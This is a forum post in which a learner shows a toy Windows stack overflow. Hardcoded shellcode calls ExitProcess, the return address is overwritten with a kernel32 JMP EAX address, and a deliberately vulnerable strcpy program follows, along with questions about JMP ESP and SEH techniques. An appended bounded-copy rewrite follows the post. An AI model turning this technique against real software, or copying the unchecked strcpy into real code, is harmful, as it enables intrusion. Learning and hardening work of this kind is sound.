Hello, I have been trying to just figure out buffer overflows on windows to satiate my curiosity. I was able to do a funny little deal that ended up like this:

Code:
#include <string.h>
#include <stdio.h>

char shellcode[] = 
	"\x31\xC0\x50\xB8\xA2\xCA\x81\x7C\xFF\xD0";

void copy(char *s) 
{
	char buf[256];
	strcpy(buf, s);
}

int main()
{
	char buffer[512];

	for(int i = 0; i < 260; i++)
		buffer[i] = 'X';

	memcpy(buffer, shellcode, strlen(shellcode));
	*(int *) (buffer + 260) = 0x7C816353;

	copy(buffer);
	printf("If we got here, it didn't exit like it should have");
	return 0;
}
The shellcode just does an ExitProcess call (hardcoded). And I overflow the return address with the address of a JMP EAX instruction in kernel32, which worked because I was lucky enough that strcpy returns a pointer to the destination string. This is very platform specific right now, and also impractical. I want to be able to do something where I can write a vulnerable program, and an exploit program which attacks it. So something like:

Code:
#include <string.h>

int main(int argc, char **argv)
{
    char buf[256];

    if(argc == 2)
        strcpy(buf, argv[1]);

    return 0;
}
Doing this brings up some problems. Firstly, EAX is zeroed before exiting, so no JMP/CALL EAX. You would think I would be able to do a JMP/CALL ESP; however, for some reason the compiler (VC) allocates 144h or 324 bytes, and the buffer starts in the middle at EBP-100h, so I can't find a suitable register to use this method.

I was wondering if this method is just too limited and whether I should just abandon it, or whether it could be salvaged. If it cannot be salvaged, I am aware of a method which involves abusing SEH frames, but I cannot for the life of me figure out how it works. Any help is so so appreciated, and I hope this is not just blown off as a script kiddie thing.
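For contrast with the argv[1] program in the post, here is what the bounded version of that copy looks like. This is an added example, not code from the original post; the names copy_arg, check_arg, check_repeated and the copy_status codes are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Result codes for the bounded copy (names are this example's own). */
enum copy_status { COPY_OK = 0, COPY_TOO_LONG = 1, COPY_NULL = 2 };

/* Hardened replacement for the bare strcpy(buf, argv[1]): refuse any
   input that does not fit in buf together with its terminating NUL,
   so nothing can run past the end of buf into the saved EBP and
   return address. */
enum copy_status copy_arg(char *buf, size_t buf_size, const char *src)
{
    if (src == NULL || buf == NULL || buf_size == 0)
        return COPY_NULL;

    /* Length scan capped at buf_size: an unterminated or very long
       input cannot make us read further than we could ever copy. */
    size_t n = 0;
    while (n < buf_size && src[n] != '\0')
        n++;
    if (n == buf_size)            /* no room left for the NUL */
        return COPY_TOO_LONG;

    memcpy(buf, src, n + 1);      /* n + 1 <= buf_size by construction */
    return COPY_OK;
}

/* Mirrors the original main(): one argument into a fixed 256-byte buffer. */
enum copy_status check_arg(const char *arg)
{
    char buf[BUF_SIZE];
    return copy_arg(buf, sizeof buf, arg);
}

/* Test helper: feed check_arg a constructed string of `len` copies of c. */
enum copy_status check_repeated(char c, size_t len)
{
    char tmp[1024];
    if (len >= sizeof tmp)
        return COPY_TOO_LONG;
    memset(tmp, c, len);
    tmp[len] = '\0';
    return check_arg(tmp);
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: prog <string>\n");
        return 2;
    }
    enum copy_status st = check_arg(argv[1]);
    printf("%s\n", st == COPY_OK ? "copied" : "rejected: too long");
    return st == COPY_OK ? 0 : 1;
}
```

The 260-byte 'X' input from the first program is rejected rather than copied; compiling the original with MSVC's /GS stack cookie would likewise turn the overwrite into an abort instead of a redirected return.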